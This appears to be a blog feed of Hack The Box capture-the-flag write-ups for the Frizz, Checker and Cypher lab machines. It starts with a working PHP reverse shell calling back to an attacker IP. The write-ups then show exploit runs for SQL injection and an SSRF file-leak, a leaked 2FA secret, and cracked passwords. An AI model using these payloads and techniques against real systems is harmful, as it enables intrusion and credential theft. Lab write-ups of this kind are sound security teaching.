            while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) {
                $this->clen -= $bytes;
                $size -= $bytes;
            }
        }
        while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) {
            $size -= $bytes;
            $this->dump($data); // script's dump
        }
    }
    public function run() {
        if ($this->detect() && !$this->daemonize()) {
            $this->settings();

            // ----- SOCKET BEGIN -----
            $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);
            if (!$socket) {
                echo "SOC_ERROR: {$errno}: {$errstr}\n";
            } else {
                stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS

                // ----- SHELL BEGIN -----
                $process = @proc_open($this->shell, $this->descriptorspec, $pipes, null, null);
                if (!$process) {
                    echo "PROC_ERROR: Cannot start the shell\n";
                } else {
                    foreach ($pipes as $pipe) {
                        stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS
                    }

                    // ----- WORK BEGIN -----
                    $status = proc_get_status($process);
                    @fwrite($socket, "SOCKET: Shell has connected! PID: " . $status['pid'] . "\n");
                    do {
						$status = proc_get_status($process);
                        if (feof($socket)) { // check for end-of-file on SOCKET
                            echo "SOC_ERROR: Shell connection has been terminated\n"; break;
                        } else if (feof($pipes[1]) || !$status['running']) {                 // check for end-of-file on STDOUT or if process is still running
                            echo "PROC_ERROR: Shell process has been terminated\n";   break; // feof() does not work with blocking streams
                        }                                                                    // use proc_get_status() instead
                        $streams = array(
                            'read'   => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR
                            'write'  => null,
                            'except' => null
                        );
                        $num_changed_streams = @stream_select($streams['read'], $streams['write'], $streams['except'], 0); // wait for stream changes | will not wait on Windows OS
                        if ($num_changed_streams === false) {
                            echo "STRM_ERROR: stream_select() failed\n"; break;
                        } else if ($num_changed_streams > 0) {
                            if ($this->os === 'LINUX') {
                                if (in_array($socket  , $streams['read'])) { $this->rw($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
                                if (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
                                if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
                            } else if ($this->os === 'WINDOWS') {
                                // order is important
                                if (in_array($socket, $streams['read'])/*------*/) { $this->rw ($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
                                if (($fstat = fstat($pipes[2])) && $fstat['size']) { $this->brw($pipes[2], $socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
                                if (($fstat = fstat($pipes[1])) && $fstat['size']) { $this->brw($pipes[1], $socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
                            }
                        }
                    } while (!$this->error);
                    // ------ WORK END ------

                    foreach ($pipes as $pipe) {
                        fclose($pipe);
                    }
                    proc_close($process);
                }
                // ------ SHELL END ------

                fclose($socket);
            }
            // ------ SOCKET END ------

        }
    }
}
echo '<pre>';
// change the host address and/or port number as necessary
$sh = new Shell('10.10.16.56', 4444);
$sh->run();
unset($sh);
// garbage collector requires PHP v5.3.0 or greater
// @gc_collect_cycles();
echo '</pre>';
?>&quot; \
--data-urlencode &quot;path=shell.php&quot; \
--data-urlencode &quot;gibbonPersonID=0000000001&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I setup a listener on port 4444 and got a reverse shell
&lt;img src=&quot;image.png&quot; alt=&quot;alt text&quot; /&gt;
I needed to escape the webservice, by investigating the current directory I could see an interesting config.php file
&lt;img src=&quot;image-1.png&quot; alt=&quot;alt text&quot; /&gt;
it contained some credentials for gibbon database
&lt;img src=&quot;image-2.png&quot; alt=&quot;alt text&quot; /&gt;
so I tried to dump the database so I can transfer it to my local machine to analyze it&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;mysqldump --user=MrGibbonsDB --password=MisterGibbs!Parrot!?1 gibbon &amp;gt; gibbon-backup.sql
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;image-3.png&quot; alt=&quot;alt text&quot; /&gt;
To transfer it locally, I exploited CVE-2023-34598, a Local File Inclusion (LFI) vulnerability. This vulnerability allows including the content of various files within the installation folder in the server&apos;s response by manipulating the q parameter. To exploit this, I moved the SQL backup file into the Gibbon website&apos;s installation folder and accessed it through the browser.
&lt;img src=&quot;image-5.png&quot; alt=&quot;alt text&quot; /&gt;
I found these credentials inside the dumped database.
&lt;img src=&quot;image-6.png&quot; alt=&quot;alt text&quot; /&gt;
I needed to crack the password, so I checked Gibbon&apos;s source code to determine how the password is hashed
&lt;img src=&quot;7.png&quot; alt=&quot;&quot; /&gt;
Gibbon hashes passwords using SHA-256 with a prepended salt. To crack it, I used Hashcat with this command:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sudo hashcat -m 1420 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;After the cracking process, I retrieved the plaintext password using&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sudo hashcat --show -m 1420 thefrizz/hash.txt
067f746faca44f170c6cd9d7c4bdac6bc:342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489:Jenni_Luvs_Magic23
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I tried to ssh using the username &lt;code&gt;f.frizzle&lt;/code&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ssh f.frizzle@frizz.htb
f.frizzle@frizz.htb: Permission denied (gssapi-with-mic,keyboard-interactive).
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, I encountered the following error, After some research, I the ssh server is using GSSAPI (Generic Security Services API) with Kerberos for SSO authentication.&lt;br /&gt;
First of all, I updated &lt;code&gt;/etc/ssh/ssh_config&lt;/code&gt; by enabling GSSAPI&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;GSSAPIAuthentication yes
GSSAPIDelegateCredentials yes
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And I had to create a &lt;code&gt;krb5.conf&lt;/code&gt; file&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[libdefaults]
    default_realm = FRIZZ.HTB

[realms]
    FRIZZ.HTB = {
        kdc = frizzdc.frizz.htb
        admin_server = 10.10.11.60
    }

[domain_realm]
    .frizz.htb = FRIZZ.HTB
    frizz.htb = FRIZZ.HTB

&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;To access SSH using SSO, I needed to obtain a &lt;strong&gt;Ticket-Granting Ticket (TGT)&lt;/strong&gt;.&lt;br /&gt;
I initiated a ticket request using the username &lt;code&gt;f.frizzle&lt;/code&gt; and password &lt;code&gt;Jenni_Luvs_Magic23&lt;/code&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;kinit -V f.frizzle@FRIZZ.HTB
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Using default cache: /tmp/krb5cc_1000
Using principal: f.frizzle@FRIZZ.HTB
Password for f.frizzle@FRIZZ.HTB:
Authenticated to Kerberos v5
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;To verify the ticket, I used:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;klist
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: f.frizzle@FRIZZ.HTB

Valid starting       Expires              Service principal
03/28/2025 22:52:07  03/29/2025 08:52:07  krbtgt/FRIZZ.HTB@FRIZZ.HTB
    renew until 03/29/2025 22:51:34
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;finnaly I tried to ssh again&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ssh f.frizzle@frizz.htb
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;image-9.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;p&gt;And I got the user flag!&lt;/p&gt;
</content:encoded></item><item><title>Checker</title><link>https://dahmanisec.me/posts/checker/checker/</link><guid isPermaLink="true">https://dahmanisec.me/posts/checker/checker/</guid><description>Hack The Box linux machine, hard difficulty</description><pubDate>Mon, 24 Mar 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h1&gt;User Flag&lt;/h1&gt;
&lt;h2&gt;Nmap scan&lt;/h2&gt;
&lt;p&gt;As always, we start our process with an nmap scan&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sudo nmap -Pn -p- -A --min-rate 5000 -oN scan.txt 10.10.11.56
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;# Nmap 7.94SVN scan initiated Sun Feb 23 19:36:13 2025 as: nmap -Pn -p- -A --min-rate 5000 -oN scan.txt 10.10.11.56
Warning: 10.10.11.56 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.56
Host is up (0.053s latency).
Not shown: 64735 closed tcp ports (reset), 797 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 aa:54:07:41:98:b8:11:b0:78:45:f1:ca:8c:5a:94:2e (ECDSA)
|_  256 8f:2b:f3:22:1e:74:3b:ee:8b:40:17:6c:6c:b1:93:9c (ED25519)
80/tcp   open  http    Apache httpd
|_http-server-header: Apache
|_http-title: 403 Forbidden
8080/tcp open  http    Apache httpd
|_http-title: 403 Forbidden
|_http-server-header: Apache
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.0
OS details: Linux 5.0
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 110/tcp)
HOP RTT      ADDRESS
1   52.06 ms 10.10.14.1
2   52.15 ms 10.10.11.56

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 23 19:37:06 2025 -- 1 IP address (1 host up) scanned in 53.87 seconds

&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The port 80 redirect us to checker.htb so I have added it to our &lt;code&gt;hosts&lt;/code&gt;file&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;echo -e &quot;10.10.11.56\t\tchecker.htb&quot; | sudo tee -a /etc/hosts
10.10.11.56		checker.htb
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I checked the open ports and found Book Stack hosted on port 80 and Teampass hosted on port 8080.
We ca easily identified the Book Stack version running, which is 23.10.2.
&lt;img src=&quot;image1.png&quot; alt=&quot;source&quot; /&gt;
After some googling I found that this version is vulnerable to an SSRF vulnerabilty that can be exploited to read local files CVE-2023-6199, but we need to be authenticated  &lt;strong&gt;remeber this we will use it later&lt;/strong&gt;. So, I knew I had to start with teampass.
&lt;img src=&quot;2025-02-28_21-27.png&quot; alt=&quot;&quot; /&gt;
To identify the version of teampass I&apos;ve downloaded the background image using wget&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;wget http://checker.htb:8080/includes/images/login_wall_5.jpg
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;then we can use stat to get the date when the image was modified:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;stat login_wall_5.jpg 
  File: login_wall_5.jpg
  Size: 1371352   	Blocks: 2680       IO Block: 4096   regular file
Device: 8,4	Inode: 5902787     Links: 1
Access: (0644/-rw-r--r--)  Uid: ( 1000/   aboud)   Gid: ( 1001/   aboud)
Access: 2025-02-28 21:34:00.000000000 +0000
Modify: 2024-06-12 18:44:59.000000000 +0100
Change: 2025-02-28 21:34:00.608379394 +0000
 Birth: 2025-02-28 21:34:00.181712686 +0000
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So the last that the image was modified is in 2024-06-12, so the version of teampass should be before this date, after looking for a release of Teampass before this date I found this version
&lt;img src=&quot;20250228213859.png&quot; alt=&quot;&quot; /&gt;
I looked in Snyk for any CVE that affect this version and found a lot, one of them is an unauthenticated SQL injection due to improper input sanitization &lt;a href=&quot;https://security.snyk.io/vuln/SNYK-PHP-NILSTEAMPASSNETTEAMPASS-3367612&quot;&gt;CVE-2023-1545&lt;/a&gt;
&lt;img src=&quot;20250228221709.png&quot; alt=&quot;&quot; /&gt;
I ran that POC and got these hashes:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;./exploit.sh http://checker.htb:8080/
There are 2 users in the system:
admin: $2y$10$lKCae0EIUNj6f96ZnLqnC.LbWqrBQCT1LuHEFht6PmE4yH75rpWya
bob: $2y$10$yMypIj1keU.VAqBI692f..XXn0vfyBL7C1EhOs35G59NxmtpJ/tiy
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Cracking hashes with John the ripper&lt;/h2&gt;
&lt;p&gt;The &lt;code&gt;$2y&lt;/code&gt; indicates that the passwords are hashed using &lt;code&gt;bcrypt $2*$, Blowfish (Unix)&lt;/code&gt;, so I used John to crack them&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sudo john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I cracker Bob&apos;s password successfully&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;bob:cheerleader
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I logged in to Teampass and found two saved passwords, a Book Stack login and an ssh access.
&lt;img src=&quot;20250228223543.png&quot; alt=&quot;&quot; /&gt;
Oh, SSH an SSH credentials
&lt;img src=&quot;20250228223835.png&quot; alt=&quot;&quot; /&gt;
The user is called &lt;code&gt;Reader&lt;/code&gt;. I tried to connect with those creds via SSH, but there is a verification code, which means that the user reader is using multi factor authentication
&lt;img src=&quot;20250228224431.png&quot; alt=&quot;&quot; /&gt;
But we have also the Book Stack  creads, I used them to login to bob&apos;s account
&lt;img src=&quot;20250228232059.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;CVE-2023-6199&lt;/h2&gt;
&lt;p&gt;Do you remember the authenticated CVE we found earlier on this version of Book Stack, now we can use it. after reading this article &lt;strong&gt;https://fluidattacks.com/advisories/imagination/&lt;/strong&gt; . I tried to confirm if the vulnerability really exists
&lt;img src=&quot;20250228234631.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.56 - - [28/Feb/2025 23:50:19] code 404, message File not found
10.10.11.56 - - [28/Feb/2025 23:50:19] &quot;GET /image.png HTTP/1.1&quot; 404 -
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I received two responses from the server, which confirm the presence of an SSRF vulnerability. Now, we need to exploit it to read local files from the server. I found an article titled &lt;a href=&quot;https://fluidattacks.com/blog/lfr-via-blind-ssrf-book-stack/?utm_source=mailing&amp;amp;utm_medium=activecampaign&amp;amp;utm_campaign=blognov22&quot;&gt;LFR via SSRF in BookStack&lt;/a&gt;, which explains how the SSRF was discovered and escalated to filter the contents of arbitrary files using the &lt;code&gt;php://&lt;/code&gt; wrapper. This was achieved by applying a simple modification to the &lt;a href=&quot;https://github.com/synacktiv/php_filter_chains_oracle_exploit&quot;&gt;php_filter_chains_oracle_exploit&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I modified the script to suit my needs, and you can find my version here: &lt;a href=&quot;https://github.com/AbdrrahimDahmani/php_filter_chains_oracle_exploit_for_CVE-2023-6199&quot;&gt;my modified code&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Filter Chain Oracle Exploit&lt;/h2&gt;
&lt;p&gt;I tried to run the script and read /etc/passwd&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ python3 filters_chain_oracle_exploit.py --parameter html --headers &apos;{&quot;Content-Type&quot;: &quot;application/x-www-form-urlencoded&quot;,&quot;X-CSRF-TOKEN&quot;:&quot;waQegWWiyvDB8J5DwQz7nhSwZojMfbvGJEIXEDEA&quot;,&quot;Cookie&quot;:&quot;bookstack_session=eyJpdiI6IkUydFZxM3Z4aHZxSVJlNXRjcGVqUXc9PSIsInZhbHVlIjoiQS9FL2xzUTNYS3N1OEFCaTl5aXVXZ1hINGFZME5Rd1l4VjVicVhEUzdBeHZvMG5tdFJOejVjNUpjaWhXd2s2WGg2dnBXZW8vMGxOQUxUWHpGS216cTh1OXRnR1MyOE5UVVRXdENDK0RzU3BqYmVSMGlEcThUeHBWRXdzWUN5WlUiLCJtYWMiOiJjYjQ5YTVlN2I4NWE1ZDIxN2NjZTRhY2QxNzFlZDYzMGRlZmIwZDc0MzQ0ZTc2NjVlYTkyMzQxNzVmMzQ4M2FiIiwidGFnIjoiIn0%3D&quot;}&apos; --verb PUT --proxy http://localhost:8010 --target http://checker.htb/ajax/page/9/save-draft --file &apos;/etc/passwd&apos;
[*] The following URL is targeted : http://checker.htb/ajax/page/9/save-draft
[*] The following local file is leaked : /etc/passwd
[*] Running PUT requests
[*] Additionnal headers used : {&quot;Content-Type&quot;: &quot;application/x-www-form-urlencoded&quot;,&quot;X-CSRF-TOKEN&quot;:&quot;waQegWWiyvDB8J5DwQz7nhSwZojMfbvGJEIXEDEA&quot;,&quot;Cookie&quot;:&quot;bookstack_session=eyJpdiI6IkUydFZxM3Z4aHZxSVJlNXRjcGVqUXc9PSIsInZhbHVlIjoiQS9FL2xzUTNYS3N1OEFCaTl5aXVXZ1hINGFZME5Rd1l4VjVicVhEUzdBeHZvMG5tdFJOejVjNUpjaWhXd2s2WGg2dnBXZW8vMGxOQUxUWHpGS216cTh1OXRnR1MyOE5UVVRXdENDK0RzU3BqYmVSMGlEcThUeHBWRXdzWUN5WlUiLCJtYWMiOiJjYjQ5YTVlN2I4NWE1ZDIxN2NjZTRhY2QxNzFlZDYzMGRlZmIwZDc0MzQ0ZTc2NjVlYTkyMzQxNzVmMzQ4M2FiIiwidGFnIjoiIn0%3D&quot;}

&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It worked, and I read partially the /etc/passwd file, then I tried to read the flag from &lt;code&gt;/home/reader/user.txt&lt;/code&gt;, but no luck.&lt;/p&gt;
&lt;p&gt;I kept digging for a while and while  I was reading the books published by bob I stumbled on this interesting folder the user created:
&lt;img src=&quot;20250228195708.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ python3 filters_chain_oracle_exploit.py --parameter html --headers &apos;{&quot;Content-Type&quot;: &quot;application/x-www-form-urlencoded&quot;,&quot;X-CSRF-TOKEN&quot;:&quot;waQegWWiyvDB8J5DwQz7nhSwZojMfbvGJEIXEDEA&quot;,&quot;Cookie&quot;:&quot;bookstack_session=eyJpdiI6IkUydFZxM3Z4aHZxSVJlNXRjcGVqUXc9PSIsInZhbHVlIjoiQS9FL2xzUTNYS3N1OEFCaTl5aXVXZ1hINGFZME5Rd1l4VjVicVhEUzdBeHZvMG5tdFJOejVjNUpjaWhXd2s2WGg2dnBXZW8vMGxOQUxUWHpGS216cTh1OXRnR1MyOE5UVVRXdENDK0RzU3BqYmVSMGlEcThUeHBWRXdzWUN5WlUiLCJtYWMiOiJjYjQ5YTVlN2I4NWE1ZDIxN2NjZTRhY2QxNzFlZDYzMGRlZmIwZDc0MzQ0ZTc2NjVlYTkyMzQxNzVmMzQ4M2FiIiwidGFnIjoiIn0%3D&quot;}&apos; --verb PUT --proxy http://localhost:8010 --target http://checker.htb/ajax/page/9/save-draft --file &apos;/backup/home_backup/home/reader/.google_authenticator&apos;
[*] The following URL is targeted : http://checker.htb/ajax/page/9/save-draft
[*] The following local file is leaked : /backup/home_backup/home/reader/.google_authenticator
[*] Running PUT requests
[*] Additionnal headers used : {&quot;Content-Type&quot;: &quot;application/x-www-form-urlencoded&quot;,&quot;X-CSRF-TOKEN&quot;:&quot;waQegWWiyvDB8J5DwQz7nhSwZojMfbvGJEIXEDEA&quot;,&quot;Cookie&quot;:&quot;bookstack_session=eyJpdiI6IkUydFZxM3Z4aHZxSVJlNXRjcGVqUXc9PSIsInZhbHVlIjoiQS9FL2xzUTNYS3N1OEFCaTl5aXVXZ1hINGFZME5Rd1l4VjVicVhEUzdBeHZvMG5tdFJOejVjNUpjaWhXd2s2WGg2dnBXZW8vMGxOQUxUWHpGS216cTh1OXRnR1MyOE5UVVRXdENDK0RzU3BqYmVSMGlEcThUeHBWRXdzWUN5WlUiLCJtYWMiOiJjYjQ5YTVlN2I4NWE1ZDIxN2NjZTRhY2QxNzFlZDYzMGRlZmIwZDc0MzQ0ZTc2NjVlYTkyMzQxNzVmMzQ4M2FiIiwidGFnIjoiIn0%3D&quot;}

&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;as output I got the google authenticator backup code&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[+] File /backup/home_backup/home/reader/.google_authenticator leak is finished!
RFZEQlJBT0RMQ1dGN0kyT05BNEs1TFFMVUUKIiBUT1RQX0FVVEgK
b&apos;DVDBRAODLCWF7I2ONA4K5LQLUE\n&quot; TOTP_AUTH\n&apos;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now I have the google authenticator backup code, I downloaded Google Authenticator on my phone, and inserted this code. then the verification codes started to be generated. I typed the verification code and authenticated successfully to reader account.
&lt;img src=&quot;20250228231908.png&quot; alt=&quot;&quot; /&gt;
The reason we could not read the user flag or the &lt;code&gt;.google_authenticator&lt;/code&gt; file from &lt;code&gt;/home/reader/&lt;/code&gt; is that they did not have read permissions for everyone&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;reader@checker:~$ ls -al user.txt .google_authenticator 
-r-------- 1 reader reader 39 Jun 14  2024 .google_authenticator
-rw-r----- 1 root   reader 33 Feb 28 18:53 user.txt
reader@checker:~$ ls -al /backup/home_backup/home/reader/user.txt /backup/home_backup/home/reader/.google_authenticator 
-rw-r--r-- 1 root root 39 Jun 14  2024 /backup/home_backup/home/reader/.google_authenticator
-rw-r--r-- 1 root root 33 Jun 14  2024 /backup/home_backup/home/reader/user.txt
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;Privilege Escalation&lt;/h1&gt;
&lt;p&gt;First, I checked the sudo privileges for the user &lt;code&gt;reader&lt;/code&gt; using: &lt;code&gt;sudo -l&lt;/code&gt;
&lt;img src=&quot;20250301165826.png&quot; alt=&quot;&quot; /&gt;
It looks like the user &lt;code&gt;reader&lt;/code&gt; has &lt;code&gt;sudo&lt;/code&gt; privileges to run &lt;code&gt;check-leak.sh&lt;/code&gt; without a password. Let&apos;s investigate the folder where &lt;code&gt;check-leak.sh&lt;/code&gt; is located.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;reader@checker:/opt/hash-checker$ ls -al
total 68
drwxr-xr-x 2 root root  4096 Jan 30 17:09 .
drwxr-xr-x 5 root root  4096 Jan 30 17:04 ..
-r-------- 1 root root   118 Jan 30 17:07 .env
-rwxr--r-- 1 root root   141 Jan 30 17:04 check-leak.sh
-rwxr--r-- 1 root root 42376 Jan 30 17:02 check_leak
-rwx------ 1 root root   750 Jan 30 17:07 cleanup.sh
-rw-r--r-- 1 root root  1464 Jan 30 17:09 leaked_hashes.txt
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;#!/bin/bash
source `dirname $0`/.env
USER_NAME=$(/usr/bin/echo &quot;$1&quot; | /usr/bin/tr -dc &apos;[:alnum:]&apos;)
/opt/hash-checker/check_leak &quot;$USER_NAME&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;check-leak.sh&lt;/code&gt; file takes a username as an argument and runs the &lt;code&gt;check_leak&lt;/code&gt; binary to check if the passwords of the username has been leaked or not.
I ran that script with bob username, and got this response:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;reader@checker:/opt/hash-checker$ sudo /opt/hash-checker/check-leak.sh bob
Password is leaked!
Using the shared memory 0xFA03C as temp location
User will be notified via bob@checker.htb
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Since &lt;code&gt;check_leak&lt;/code&gt; is a compiled binary, I dumped it onto my local machine and opened it in &lt;strong&gt;Binary Ninja&lt;/strong&gt; for reverse engineering.
&lt;img src=&quot;20250301171128.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;The program creates a shared memory segment with a predictable key (using &lt;code&gt;srand(time(NULL))&lt;/code&gt; and &lt;code&gt;rand()&lt;/code&gt;), writes a leaked hash into it, then sleeps for 1 second before clearing it.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;The shared memory has read/write permissions for all users (0o666), allowing any user to attach and modify it during the 1-second window.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>Cypher</title><link>https://dahmanisec.me/posts/cypher/</link><guid isPermaLink="true">https://dahmanisec.me/posts/cypher/</guid><description>Hack The Box linux machine, medium difficulty</description><pubDate>Sun, 23 Mar 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h1&gt;User Flag&lt;/h1&gt;
&lt;h2&gt;Nmap Scan&lt;/h2&gt;
&lt;p&gt;As always we start with an Nmap scan&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Nmap 7.94SVN scan initiated Sat Mar  1 22:40:25 2025 as: nmap -Pn -p- -A --min-rate 5000 -oN scan.txt 10.10.11.57
Nmap scan report for 10.10.11.57 (10.10.11.57)
Host is up (0.050s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 be:68:db:82:8e:63:32:45:54:46:b7:08:7b:3b:52:b0 (ECDSA)
|_  256 e5:5b:34:f5:54:43:93:f8:7e:b6:69:4c:ac:d6:3d:23 (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cypher.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.0
OS details: Linux 5.0
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1025/tcp)
HOP RTT      ADDRESS
1   50.10 ms 10.10.14.1 (10.10.14.1)
2   50.16 ms 10.10.11.57 (10.10.11.57)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar  1 22:40:50 2025 -- 1 IP address (1 host up) scanned in 24.89 seconds 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I added &lt;code&gt;cypher.htb&lt;/code&gt;to &lt;code&gt;/etc/hosts&lt;/code&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;echo -e &quot;10.10.11.57\tcypher.htb&quot; | sudo tee -a /etc/hosts
10.10.11.57	cypher.htb
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Directories enumeration&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;$ ffuf -u http://cypher.htb/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt 

        /&apos;___\  /&apos;___\           /&apos;___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://cypher.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

about                   [Status: 200, Size: 4986, Words: 1117, Lines: 179, Duration: 54ms]
api                     [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 55ms]
demo                    [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 63ms]
index                   [Status: 200, Size: 4562, Words: 1285, Lines: 163, Duration: 114ms]
login                   [Status: 200, Size: 3671, Words: 863, Lines: 127, Duration: 53ms]
testing                 [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 53ms]
:: Progress: [20476/20476] :: Job [1/1] :: 732 req/sec :: Duration: [0:00:41] :: Errors: 0 ::
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Exploring Exposed Artifacts and Identifying Vulnerabilities&lt;/h2&gt;
&lt;p&gt;By navigating to the testing folder I found jar file left exposed by someone
&lt;img src=&quot;image.png&quot; alt=&quot;&quot; /&gt;
I opened it with JD-GUI and found that it contains a class called CustomFunctions, which creates a custom Neo4j function named &lt;strong&gt;custom.getUrlStatusCode&lt;/strong&gt;. It is designed to fetch the HTTP status code for a given URL. The function uses a shell command to execute curl and retrieves the status code.
&lt;img src=&quot;image1.png&quot; alt=&quot;&quot; /&gt;
